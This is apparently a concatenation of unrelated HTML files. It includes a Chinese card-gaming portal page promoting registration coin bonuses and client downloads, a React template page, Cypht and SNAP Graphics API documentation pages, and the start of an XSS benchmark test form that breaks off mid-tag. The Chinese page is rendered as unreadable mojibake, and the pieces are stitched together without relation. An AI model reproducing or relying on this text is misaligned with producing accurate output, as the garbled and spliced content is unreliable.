#cdcdcd 1px solid; margin-top:10px; width:960px; margin:5px auto"> <div id="lunbobg"> <ul> <li><a href="http://www.789game.com/NewsShow.aspx?XID=439"> <img src="/qipai/templets/default/images/1-1.jpg" width="960" height="424"></a></a></li> <li><a href="http://down.789game.net/tgdownload/1272461/789GameCenter.exe"> <img src="/qipai/templets/default/images/2-1.jpg" width="960" height="424"></a></a></li> <li><a href="http://www.789game.com/NewsShow.aspx?XID=2006"> <img src="/qipai/templets/default/images/3-1.jpg" width="960" height="424"></a></a></li> </ul> </div> </div> <div class="main"> <div id=p_con><!--Ò³Ãæ×ó²à²¿·Ö ¿ªÊ¼ --> <div class=p_l> <div class=location> <img src="/qipai/templets/default/images/flag.png" width=16 height=16> µ±Ç°Î»ÖÃ:</strong><a href='/qipai'>ÆåÅÆÓÎÏ·</a> > <a href='/qipai/qipaiyouxipingtai/'>ÆåÅÆÓÎϷƽ̨</a> > </div> <div id=pnlContent> <h1 class=que-title>Ò׿áÆåÅÆÓÎÏ·ÖÐÐÄ×¢²áËͽð±Ò</h1> <div class="articelinfo"><span>×÷Õߣºadmin</span><span>·¢²¼Ê±¼ä£º2015-06-01</span></div> <div class=que-content> &nbsp; &nbsp; &nbsp; &nbsp; ×÷ΪÆåÅÆÀàÓÎÏ·µ±ÖÐ×î¾ßÓÐÈËÆøµÄÒ׿áÆåÅÆÓÎÏ·ÓÎÏ·ÔٴεãȼÁËÓÎÏ·ÍøÂçµÄÕ½»ð£¬ÒýÀ´ÁËÎÞÊý¹ÛÖÚºÍÍæ¼ÒÃǵÄΧ¹Û¡£Ëæ×ÅÐÂÒ»ÂÖµÄÖØÐ¿ªÆô£¬<strong>Ò׿áÆåÅÆÓÎÏ·ÖÐÐÄ</strong>¸üÊÇÖØ°õÀ´Ï®£¬¾«²ÊÁ¬Á¬°¡¡£<br /> <h2> <br /> <img alt="Ò׿áÆåÅÆ" src="/qipai/uploads/allimg/150601/1-150601153932333.jpg" style="width: 604px; height: 375px;" /><br /> <br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Ò׿áÆåÅÆÓÎÏ·ÖÐÐÄ</h2> <br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ÓÉÓÚÓÎÏ·Íæ¼Ò´ïµ½Á˷dz£¶àµÄÊýÁ¿£¬ÓÎÏ·ÖÐÏ·¿ªÍ¨Á˶þÊ®ËÄСʱ²»¼ä¶Ï±ÈÈüÄÚÈÝ£¬Ï²»¶ÆåÅÆÀàÓÎÏ·µÄÅóÓÑÃÇÔÚÕâÀï¾Í²»»áÓÐÉîÒ¹ÕÒ²»µ½Íæ¼ÒµÄ¿àÄÕÁË¡£¶øÇÒÕâ¶ÔÖÚ¶àÆåÅÆÓÎÏ·ÃÔÀ´ËµÒ²Í¬ÑùÊÇÒ»´ó¸£Àû£¬Í¨¹ýÒ׿áÆåÅÆÓÎÏ·ÖÐÐĵį½Ì¨ËûÃǾͿÉÒÔÃâ·Ñ¹Û¿´µ½ÖÇÕßÖ®¼äµÄ¾«²Ê²©ÞÄ¡£<br /> <h3> <br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Ò׿áÆåÅÆÓÎÏ·ÖÐÐÄ×¢²áËͽð±Ò</h3> <br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ÁíÍ⣬ΪÁËÄܹ»ÎüÒýµ½¸ü¶àµÄÐÂÊÖÍæ¼Ò£¬Ò׿áÆåÅÆÓÎÏ·ÖÐÐÄÒ»Èç¼ÈÍùµØ»á¸øÓèÐÂ×¢²áµÄÍæ¼Ò½ð±Ò½±Àø£¬ÕâÑùÐÂÊÖÃÇͬÑù¿ÉÒÔÓë¹úÄÚÖÚ¶àÍæ¼Ò»¶¿ì³©ÍæÁË¡£ÒòΪÕâ¿îÓÎÏ·ÄÚÈݾ«²Ê£¬»­Öʾ«Á¼£¬²¢ÇҾܾø·Ç·¨µÄÓÎÏ·ÊֶΣ¬´Ó¶øÉîÊÜÍæ¼ÒÃǵÄϲ°®£¬µ½Ä¿Ç°ÎªÖ¹Í¬Ê±ÔÚÏßµÄÍæ¼ÒÈËÊýҲҪά³ÖÔÚǧÈËÒÔÉÏ¡£ÕâÑù¾ÍÄܸü¿ìµØÆ¥Åäµ½¿ÉÒÔºÍÄãÒ»¿é³©ÍæµÄÍæ¼ÒÁË¡£<br /> <br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Èç¹û¾õµÃµÇÂ¼ÍøÒ³ÍæÓÎÏ·±È½ÏÂé·³µÄ»°£¬Ò׿áÆåÅÆÓÎÏ·ÖÐÐÄͬÑùÖ§³ÖÏÂÔØÒµÎñ£¬Íæ¼Ò¿ÉÒÔ°ÑÕâ¿îÓÎÏ·ÏÂÔØµ½×Ô¼ºµÄÖն˲úÆ·ÉÏÀ´£¬ÕâÑù¾Í¿ÉÒÔËæÊ±ËæµØ³©Í治ͣÁË¡£<br /> </div> <div class=pre-nex>ÉÏһƪ£º<a href='/qipai/qipaiyouxipingtai/2508.html'>Ò»ÆðÓÎÀÖÆåÅÆ´óÌüÏÂÔØ¡ªÒ»ÆðÓÎÀÖÆåÅÆÕý°æ</a> &nbsp;&nbsp;&nbsp;&nbsp;ÏÂһƪ£º<a href='/qipai/qipaiyouxipingtai/2510.html'>Ò×·¢ÆåÅÆÓÎÏ·ÏÂÔØ¡ªÒ×·¢ÆåÅÆÓÎϷƽ̨</a> </div> </div> </div> <!--ÓÒ²àÏÂÔØ begin--> <DIV class=p_r_xiazai> <DIV class=r_ad> <DIV class=dl_client_v2> <A style="BACKGROUND-POSITION: 22px -536px" href="http://down.789game.net/tgdownload/1272461/789GameCenter.exe" class=client_dl title=ÏÂÔØ¿Í»§¶Ë rel=nofollow></A> </DIV> </DIV> </div> <div class="ewmDown"> <div class="anzhuoDown"> <a href="http://download.6513.com/phoneGame/590145BY.apk" class="dowmForA" rel="nofollow"></a> </div> <div class="appleDown"> <a href="https://itunes.apple.com/us/app/jie-ji-jin-chan-bu-yu-mian/id1022745046?l=zh&ls=1&mt=8" class="dowmForI" target='_blank' rel="nofollow"></a> </div> </div> <DIV class=p_r> <DIV class=tags> <DL class=box_dl> <DT>ÓÎÏ·½éÉÜ</DT> <DIV class=tags> <A href="http://www.789game.com/GameRulesShow.aspx?XID=610" target="_blnak">½ð󸲶Óã</A> <A href="http://shuihu.789game.com/" target="_blnak">°ÙÒ×ˮ䰴«</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=601" target="_blnak">´óÊ¥ÄÖº£</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=203" target="_blnak">ˮ䰴«</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=2040" target="_blank">нð󸲶Óã</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=6" target="_blank">789Ó®ÈýÕÅ</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=361" target="_blank">¶þÈËÂ齫</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=102" target="_blank">¶þÈ˶·Å£</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=27" target="_blank">ËÄÈ˶·Å£</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=200" target="_blank">¶·µØÖ÷</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=5501" target="_blank">ÀîåÓÅüÓã</A> <A href="http://www.789game.com/" target="_blank">ÆåÅÆÆ½Ì¨</A> <A href="http://www.789game.com/NewsShow.aspx?XID=130" target="_blank">ÓÎÏ·Ìü²¶Óã´ïÈË</A> <A href="http://buyu.789game.com/" target="_blank">½Ö»úǧÅÚ²¶Óã¹ÙÍø</A> </DIV> </DL> </DIV> <DL class=box_dl> <DT>ÍÆ¼öÎÄÕÂ</DT> <DD><a href="/qipai/qipaiyouxipingtai/2783.html">çÆÔÆÓÎÏ·ÖÐÐÄ ÈÎÄãåÛÓÎÆåÅÆÊÀ½ç</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/2782.html">н®ÌìÉ½ÍøÓÎÏ·ÖÐÐĹÙÍø ×îºÃµÄ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/2781.html">ÐÂÀËÆåÅÆÖÐÐÄÏÂÔØ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/2780.html">½¨µÂÓÎÏ·ÖÐÐÄ_¿ÉÒÔÊÍ·ÅѹÁ¦µÄÆå</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/2779.html">çÆÔÆÓÎÏ·ÖÐÐÄ_×îºÃµÄÆåÅÆÓÎϷƽ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/2778.html">¼Ñľ˹ÁúÓòÓÎÏ·ÖÐÐÄÏÂÔØ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/2777.html">1368ÆåÅÆÓÎϷƽ̨</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/2776.html">°®ÆåÅÆÓÎÏ·ÖÐÐÄ£¬ÆåÅÆÀàÓÎÏ·°®ºÃ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/2775.html">½¨µÂÓÎÏ·ÖÐÐÄÊÖ»ú°æÏÂÔØ¸üºÃÍæ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/2774.html">789ÆåÅÆÓÎÏ·ÊÖ»ú°æÏÂÔØ</a> </DD> </DL> <DL class=box_dl> <DT>×îÈÈÎÄÕÂ</DT> <DD><a href="/qipai/qipaiyouxipingtai/17.html">°²»Õ±ß·æÓÎÏ·¶·µØÖ÷</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/365.html">»ªÏÄÆåÅÆÓÎÏ·</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/1156.html">Öйú»¥¶¯ÓÎÏ·ÖÐÐÄÓÎϷƽ̨-Öйú</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/1199.html">çÆÔÆÓÎÏ·ÖÐÐĵÄÓÎÏ·Íæ·¨</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/1240.html">psp¶·µØÖ÷µÄÌØµã</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/1834.html">¿ªÐĶ·µØÖ÷ÏÂÔØÊ±Òª×¢ÒâµÄÎÊÌâ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/1926.html">ÁªÖÚ¶·µØÖ÷ÓÎÏ·ÄÜÓÐЧ»º½âѹÁ¦</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/1932.html">173ÓÎÏ·Íø£¬¸øÄã×îºÃµÄÓÎÏ·ÌåÑé</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/2071.html">Ãæ¶ÔÃæµÄÊÓÆµ¶·µØÖ÷ÈÃÈËÃÇÓкõÄ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/2092.html">ºÃÍæµÄ²¶Óã´ïÈË3ÄÚ¹º1.0.7°æ±¾</a> </DD> </DL> </DIV> </div> <!--Ò³ÃæÓҲಿ·Ö ½áÊø --> </div> </div> <DIV class=footer> µÖÖÆ²»Á¼ÓÎÏ·&nbsp;&nbsp;¾Ü¾øµÁ°æÓÎÏ·&nbsp;&nbsp;×¢Òâ×ÔÎÒ±£»¤&nbsp;&nbsp;½÷·ÀÊÜÆ­Éϵ±&nbsp;&nbsp;ÊʶÈÓÎÏ·ÒæÄÔ&nbsp;&nbsp;³ÁÃÔÓÎÏ·ÉËÉí&nbsp;&nbsp;ºÏÀí°²ÅÅʱ¼ä&nbsp;&nbsp;ÏíÊܽ¡¿µÉú»î <BR> <a href="http://www.789game.com">789ÓÎÏ·ÖÐÐÄ</a>http://www.789game.com/ Ô¥ICP±¸12014032ºÅ-1 ±¸°¸ÎĺÅ:ÎÄÍøÓα¸×Ö[2011]C-CBG002ºÅ<BR>¿Í·þQQ£º4000371814 ¿Í·þÈÈÏߣº4000371814 <script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fde6684532de22a1b45cd44b14141ff07' type='text/javascript'%3E%3C/script%3E")); </script> </DIV> <style> #banners {margin-top:-50px;} #banners .hd {margin-top:-15px;width:100%;float:left;} #banners .hd ul {width: 555px;z-index: 100; position: absolute; left: 45%; } #banners .hd ul li {float: left; width: 11px; height: 11px; background-color: #fff; overflow: hidden; text-indent: -9999px; border-radius:6px;cursor:pointer; opacity: 0.5;filter: alpha(opacity=50); cursor: pointer;} #banners .hd ul li.on {opacity: 1;filter: alpha(opacity=100);} </style> <div style="position:absolute;width:200px;top:340px;"> <div id="ad_right" style="position:fixed;width:142px;height:327px;z-index:8886;"> <a style="float:right;position:absolute;left:145px;margin-left:-20px;width:17px;height:17px;background:url(/qipai/templets/default/images/close1.png) no-repeat;z-index:8888;" id="closeleftbar" href="javascript:void(0);"></a> <div class="leftLoops leftLoop1" style="z-index:8887" id="banners"> <div class="bd bd3"> <ul class="picLists"> <li> <a href="http://www.789game.com/NewsShow.aspx?XID=439" target="_blank" style="width:100%;float:left;text-align:center;margin-top:50px;"> <img src="/qipai/templets/default/images/001leftQP.jpg" width="142" height="327" alt="" title="" /></a> </a> </li> <li> <a href="http://www.789game.com/NewsShow.aspx?XID=2006" target="_blank" style="width:100%;float:left;text-align:center;margin-top:50px;"> <img src="/qipai/templets/default/images/sh.jpg" width="142" height="327" alt="" title="" /></a> </a> </li> </ul> </div> <div class="hd"> <ul></ul> </div> </div> </div> <script type="text/javascript" src="/qipai/templets/default/js/jquery.SuperSlide.js"></script> <script type="text/javascript"> $(document).ready(function () { $("#closeleftbar").click(function(){ $("#ad_right").css("display","none"); }); }); jQuery("#banners").slide({titCell:".hd ul",mainCell:".bd3 ul",effect:"leftLoop",autoPlay:true,autoPage:true,vis:1,scroll:1,trigger:"click",interTime:3000});</script> <script type="text/javascript"> $(function() { var sWidth = $("#lunbobg").width(); //»ñÈ¡½¹µãͼµÄ¿í¶È£¨ÏÔÊ¾Ãæ»ý£© var len = $("#lunbobg ul li").length; //»ñÈ¡½¹µãͼ¸öÊý var index = 0; var picTimer; //ÒÔÏ´úÂëÌí¼ÓÊý×Ö°´Å¥ºÍ°´Å¥ºóµÄ°ë͸Ã÷Ìõ£¬»¹ÓÐÉÏÒ»Ò³¡¢ÏÂÒ»Ò³Á½¸ö°´Å¥ var btn = "<div class='btnBg'></div><div class='btn'>"; for(var i=0; i < len; i++) { btn += "<span></span>"; } btn += "</div><div class='preNext pre'></div><div class='preNext next'></div>"; $("#lunbobg").append(btn); $("#lunbobg .btnBg").css("opacity",0); //ΪС°´Å¥Ìí¼ÓÊó±ê»¬Èëʼþ£¬ÒÔÏÔʾÏàÓ¦µÄÄÚÈÝ $("#lunbobg .btn span").css("opacity",0.4).mouseover(function() { index = $("#lunbobg .btn span").index(this); showPics(index); }).eq(0).trigger("mouseover"); //ÉÏÒ»Ò³¡¢ÏÂÒ»Ò³°´Å¥Í¸Ã÷¶È´¦Àí $("#lunbobg .preNext").css("opacity",0.08).hover(function() { $(this).stop(true,false).animate({"opacity":"0.5"},300); },function() { $(this).stop(true,false).animate({"opacity":"0.08"},300); }); //ÉÏÒ»Ò³°´Å¥ $("#lunbobg .pre").click(function() { index -= 1; if(index == -1) {index = len - 1;} showPics(index); }); //ÏÂÒ»Ò³°´Å¥ $("#lunbobg .next").click(function() { index += 1; if(index == len) {index = 0;} showPics(index); }); //±¾ÀýΪ×óÓÒ¹ö¶¯£¬¼´ËùÓÐliÔªËØ¶¼ÊÇÔÚͬһÅÅÏò×󸡶¯£¬ËùÒÔÕâÀïÐèÒª¼ÆËã³öÍâΧulÔªËØµÄ¿í¶È $("#lunbobg ul").css("width",sWidth * (len)); //Êó±ê»¬ÉϽ¹µãͼʱֹͣ×Ô¶¯²¥·Å£¬»¬³öʱ¿ªÊ¼×Ô¶¯²¥·Å $("#lunbobg").hover(function() { clearInterval(picTimer); },function() { picTimer = setInterval(function() { showPics(index); index++; if(index == len) {index = 0;} },3000); //´Ë4000´ú±í×Ô¶¯²¥·ÅµÄ¼ä¸ô£¬µ¥Î»£ººÁÃë }).trigger("mouseleave"); //ÏÔʾͼƬº¯Êý£¬¸ù¾Ý½ÓÊÕµÄindexÖµÏÔʾÏàÓ¦µÄÄÚÈÝ function showPics(index) { //ÆÕͨÇл» var nowLeft = -index*sWidth; //¸ù¾ÝindexÖµ¼ÆËãulÔªËØµÄleftÖµ $("#lunbobg ul").stop(true,false).animate({"left":nowLeft},300); //ͨ¹ýanimate()µ÷ÕûulÔªËØ¹ö¶¯µ½¼ÆËã³öµÄposition $("#lunbobg .btn span").stop(true,false).animate({"opacity":"0.2"},300).eq(index).stop(true,false).animate({"opacity":"1"},300); //Ϊµ±Ç°µÄ°´Å¥Çл»µ½Ñ¡ÖеÄЧ¹û } }); </script> </body> </HTML>
index.html
CFerndp/reactWeb-FrameworkTemplate
<!-- index.html --> <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>Web Title</title> <!-----Declaracion elementos graficos------> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="css/style.css"> <link rel="stylesheet" href="http://www.w3schools.com/lib/w3.css"> <link rel="stylesheet" href="css/w3-theme-dark-grey.css"> <link rel="stylesheet" href="http://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.4.0/css/font-awesome.min.css"> <!-----Declaracion elementos funcionales------> <script src="js/libs/react/react.js"></script> <script src="js/libs/react/react-dom.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/babel-core/5.8.23/browser.min.js"></script> </head> <body> <div class="main-container" id="content"></div> <script type="text/babel" src="js/scripts/web.js"></script> </body> </html>
docs/code_docs/function-prepare_imap_message_list.html
thetomester13/hm3
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Function prepare_imap_message_list | Cypht Documentation</title> <link rel="stylesheet" href="resources/style.css?e99947befd7bf673c6b43ff75e9e0f170c88a60e"> </head> <body> <div id="left"> <div id="menu"> <a href="index.html" title="Overview"><span>Overview</span></a> <div id="groups"> <h3>Packages</h3> <ul> <li> <a href="package-framework.html"> framework<span></span> </a> <ul> <li> <a href="package-framework.auth.html"> auth </a> </li> <li> <a href="package-framework.cache.html"> cache </a> </li> <li> <a href="package-framework.config.html"> config </a> </li> <li> <a href="package-framework.crypt.html"> crypt </a> </li> <li> <a href="package-framework.db.html"> db </a> </li> <li> <a href="package-framework.dispatch.html"> dispatch </a> </li> <li> <a href="package-framework.format.html"> format </a> </li> <li> <a href="package-framework.module.html"> module </a> </li> <li> <a href="package-framework.modules.html"> modules </a> </li> <li> <a href="package-framework.oauth2.html"> oauth2 </a> </li> <li> <a href="package-framework.output.html"> output </a> </li> <li> <a href="package-framework.request.html"> request </a> </li> <li> <a href="package-framework.servers.html"> servers </a> </li> <li> <a href="package-framework.session.html"> session </a> </li> <li> <a href="package-framework.setup.html"> setup </a> </li> </ul></li> <li> <a href="package-modules.html"> modules<span></span> </a> <ul> <li> <a href="package-modules.account.html"> account<span></span> </a> <ul> <li> <a href="package-modules.account.handler.html"> handler </a> </li> <li> <a href="package-modules.account.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.calendar.html"> calendar<span></span> </a> <ul> <li> <a href="package-modules.calendar.handler.html"> handler </a> </li> <li> <a href="package-modules.calendar.lib.html"> lib </a> </li> <li> <a href="package-modules.calendar.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.contacts.html"> contacts<span></span> </a> <ul> <li> <a href="package-modules.contacts.handler.html"> handler </a> </li> <li> <a href="package-modules.contacts.lib.html"> lib </a> </li> <li> <a href="package-modules.contacts.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.core.html"> core<span></span> </a> <ul> <li> <a href="package-modules.core.functions.html"> functions </a> </li> <li> <a href="package-modules.core.handler.html"> handler </a> </li> <li> <a href="package-modules.core.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.developer.html"> developer<span></span> </a> <ul> <li> <a href="package-modules.developer.handler.html"> handler </a> </li> <li> <a href="package-modules.developer.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.feeds.html"> feeds<span></span> </a> <ul> <li> <a href="package-modules.feeds.functions.html"> functions </a> </li> <li> <a href="package-modules.feeds.handler.html"> handler </a> </li> <li> <a href="package-modules.feeds.lib.html"> lib </a> </li> <li> <a href="package-modules.feeds.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.github.html"> github<span></span> </a> <ul> <li> <a href="package-modules.github.functions.html"> functions </a> </li> <li> <a href="package-modules.github.handler.html"> handler </a> </li> <li> <a href="package-modules.github.lib.html"> lib </a> </li> <li> <a href="package-modules.github.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.helloworld.html"> helloworld<span></span> </a> <ul> <li> <a href="package-modules.helloworld.handler.html"> handler </a> </li> <li> <a href="package-modules.helloworld.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.idletimer.html"> idletimer<span></span> </a> <ul> <li> <a href="package-modules.idletimer.handler.html"> handler </a> </li> <li> <a href="package-modules.idletimer.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.imap.html"> imap<span></span> </a> <ul> <li> <a href="package-modules.imap.functions.html"> functions </a> </li> <li> <a href="package-modules.imap.handler.html"> handler </a> </li> <li> <a href="package-modules.imap.lib.html"> lib </a> </li> <li> <a href="package-modules.imap.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.nux.html"> nux<span></span> </a> <ul> <li> <a href="package-modules.nux.functions.html"> functions </a> </li> <li> <a href="package-modules.nux.handler.html"> handler </a> </li> <li> <a href="package-modules.nux.lib.html"> lib </a> </li> <li> <a href="package-modules.nux.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.pop3.html"> pop3<span></span> </a> <ul> <li> <a href="package-modules.pop3.functions.html"> functions </a> </li> <li> <a href="package-modules.pop3.handler.html"> handler </a> </li> <li> <a href="package-modules.pop3.lib.html"> lib </a> </li> <li> <a href="package-modules.pop3.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.profile.html"> profile<span></span> </a> <ul> <li> <a href="package-modules.profile.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.smtp.html"> smtp<span></span> </a> <ul> <li> <a href="package-modules.smtp.functions.html"> functions </a> </li> <li> <a href="package-modules.smtp.handler.html"> handler </a> </li> <li> <a href="package-modules.smtp.lib.html"> lib </a> </li> <li> <a href="package-modules.smtp.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.swipe2fa.html"> swipe2fa<span></span> </a> <ul> <li> <a href="package-modules.swipe2fa.functions.html"> functions </a> </li> <li> <a href="package-modules.swipe2fa.handler.html"> handler </a> </li> <li> <a href="package-modules.swipe2fa.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.themes.html"> themes<span></span> </a> <ul> <li> <a href="package-modules.themes.functions.html"> functions </a> </li> <li> <a href="package-modules.themes.handler.html"> handler </a> </li> <li> <a href="package-modules.themes.output.html"> output </a> </li> </ul></li> <li> <a href="package-modules.wordpress.html"> wordpress<span></span> </a> <ul> <li> <a href="package-modules.wordpress.functions.html"> functions </a> </li> <li> <a href="package-modules.wordpress.handler.html"> handler </a> </li> <li> <a href="package-modules.wordpress.output.html"> output </a> </li> </ul></li></ul></li> </ul> </div> <hr> <div id="elements"> <h3>Functions</h3> <ul> <li><a href="function-add_attached_images.html">add_attached_images</a></li> <li><a href="function-build_page_links.html">build_page_links</a></li> <li><a href="function-format_imap_folder_section.html">format_imap_folder_section</a></li> <li><a href="function-format_imap_message_list.html">format_imap_message_list</a></li> <li><a href="function-format_msg_part_row.html">format_msg_part_row</a></li> <li><a href="function-format_msg_part_section.html">format_msg_part_section</a></li> <li><a href="function-imap_data_sources.html">imap_data_sources</a></li> <li><a href="function-merge_imap_search_results.html">merge_imap_search_results</a></li> <li class="active"><a href="function-prepare_imap_message_list.html">prepare_imap_message_list</a></li> <li><a href="function-process_imap_message_ids.html">process_imap_message_ids</a></li> <li><a href="function-sort_by_internal_date.html">sort_by_internal_date</a></li> </ul> </div> </div> </div> <div id="splitter"></div> <div id="right"> <div id="rightInner"> <form id="search"> <input type="hidden" name="cx" value=""> <input type="hidden" name="ie" value="UTF-8"> <input type="text" name="q" class="text" placeholder="Search"> </form> <div id="navigation"> <ul> <li> <a href="index.html" title="Overview"><span>Overview</span></a> </li> <li> <span>Package</span> </li> <li class="active"> <span>Function</span> </li> </ul> <ul> <li> <a href="tree.html" title="Tree view of classes, interfaces, traits and exceptions"><span>Tree</span></a> </li> <li> <a href="annotation-group-deprecated.html" title="List of elements with deprecated annotation"> <span>Deprecated</span> </a> </li> <li> <a href="annotation-group-todo.html" title="List of elements with todo annotation"> <span>Todo</span> </a> </li> </ul> <ul> <li> <a href="-API-documentation.zip" title="Download documentation as ZIP archive"><span>Download</span></a> </li> </ul> </div> <div id="content" class="function"> <h1>Function prepare_imap_message_list</h1> <div class="description"> <p>Prepare and format message list data</p> </div> <div class="info"> <b>Package:</b> <a href="package-modules.html">modules</a>\<a href="package-modules.imap.html">imap</a>\<a href="package-modules.imap.functions.html">functions</a><br> <b>Located at</b> <a href="source-function-prepare_imap_message_list.html#1423-1437" title="Go to source code"> imap/modules.php </a><br> </div> <table class="summary" id="parameters"> <caption>Parameters summary</caption> <tr id="$msgs"> <td class="name"><code>array</code></td> <td class="value"><code><var>$msgs</var></code></td> <td>list of message headers to format</td> </tr> <tr id="$mod"> <td class="name"><code>object</code></td> <td class="value"><code><var>$mod</var></code></td> <td>Hm_Output_Module</td> </tr> <tr id="$type"> <td class="name"><code></code></td> <td class="value"><code><var>$type</var></code></td> <td></td> </tr> </table> </div> <div id="footer"> Cypht Documentation API documentation generated by <a href="http://apigen.org">ApiGen</a> </div> </div> </div> <script src="resources/combined.js?11103d5bda05b31faaed27f8dac7ff566f7e6eef"></script> <script src="elementlist.js?341a24b610ee59935e2a39085b09917a67158213"></script> </body> </html>
docs/snap_ga/html/notoc/EVT_allowLEDS.html
OS2World/DEV-UTIL-SNAP
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta name="Generator" content="ReWorX 1.1 (021204) - http://www.republico.com" /> <meta name="Originator" content="Microsoft Word 9" /> <title>EVT_allowLEDS</title> <link rel="StyleSheet" type="text/css" href="SNAP%20Graphics%20Architecture.css" /> <script type="text/javascript" src="RePublico.js"> </script> </head> <body style="tab-interval:.5in;" lang="EN-US" link="blue" vlink="purple" class="rpomain" onbeforeprint="JavaScript:RePublicoOnBeforePrint();" onafterprint="JavaScript:RePublicoOnAfterPrint();" onload="RePublicoShowHide();RePublicoBanner(1);"> <div class="Section4"> <p style="tab-stops:'.45in .7in .95in 1.2in';" class="FuncHeading3"> EVT_allowLEDS </p> <p style="tab-stops:'.45in .7in .95in 1.2in';" class="MsoBodyText"> Enables/disables the update of the keyboard LED status indicators. </p> <p style="tab-stops:'.45in .7in .95in 1.2in';" class="MethodSection"> Declaration </p> <p style="tab-stops:'.45in .7in .95in 1.2in';" class="Preformatted"> void EVTAPI EVT_allowLEDS(<br /> &#160;&#160;&#160; ibool enable) </p> <p style="tab-stops:'.45in .7in .95in 1.2in';" class="MethodSection"> Prototype In </p> <p style="tab-stops:'.45in .7in .95in 1.2in';" class="MsoBodyText"> event.h </p> <p style="tab-stops:'.45in .7in .95in 1.2in';" class="MethodSection"> Parameters </p> <div align="center"> <table style="border-collapse:collapse;" border="0" cellspacing="0" cellpadding="0"> <tr> <td style="width:84.5pt;padding:'0in .5pt 0in .5pt';" width="141" valign="top"> <p style="tab-stops:'.45in .7in .95in 1.2in';" class="ParameterName"> enable </p> </td> <td style="width:315.0pt;padding:'0in .5pt 0in .5pt';" width="525" valign="top"> <p style="tab-stops:'.45in .7in .95in 1.2in';" class="Parameter"> True to enable, false to disable </p> </td> </tr> </table> </div> <p style="tab-stops:'.45in .7in .95in 1.2in';" class="SingleSpace"> &nbsp; </p> <p style="tab-stops:'.45in .7in .95in 1.2in';" class="MethodSection"> Description </p> <p style="tab-stops:'.45in .7in .95in 1.2in';" class="MsoBodyText"> Enables the update of the keyboard LED status indicators. Sometimes it may be convenient in the application to turn off the updating of the LED status indicators (such as if a game is using the CAPSLOCK key for some function). Passing in a value of FALSE to this function will turn off all the LEDS, and stop updating them when the internal status changes (note however that internally we still keep track of the toggle key status!). </p> </div> <p class="CitationBody"> Copyright &#169; 2002 SciTech Software, Inc. Visit our web site at <a href="http://www.scitechsoft.com" target="_top">http://www.scitechsoft.com<a> </p> </body> </html>
src/main/webapp/xss-01/BenchmarkTest00807.html
h3xstream/Benchmark
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <script src="/benchmark/js/jquery.min.js"></script> <script type="text/javascript" src="/benchmark/js/js.cookie.js"></script> <title>BenchmarkTest00807</title> </head> <body> <form action="/benchmark/xss-01/BenchmarkTest00807" method="GET" id="FormBenchmarkTest00807"> <div><label>Please enter your details:</label></div> <br/> <div><label>Username:</label></div> <div><input type="text" id="username" name="username"></input></div> <div><label>Password:</label></div> <div><input type="text" id="password" name="password" value=""></input></div> <div>&nbsp;</div> <div><label>Parameter: BenchmarkTest00807 <BR> Value:</label> <input type="text" 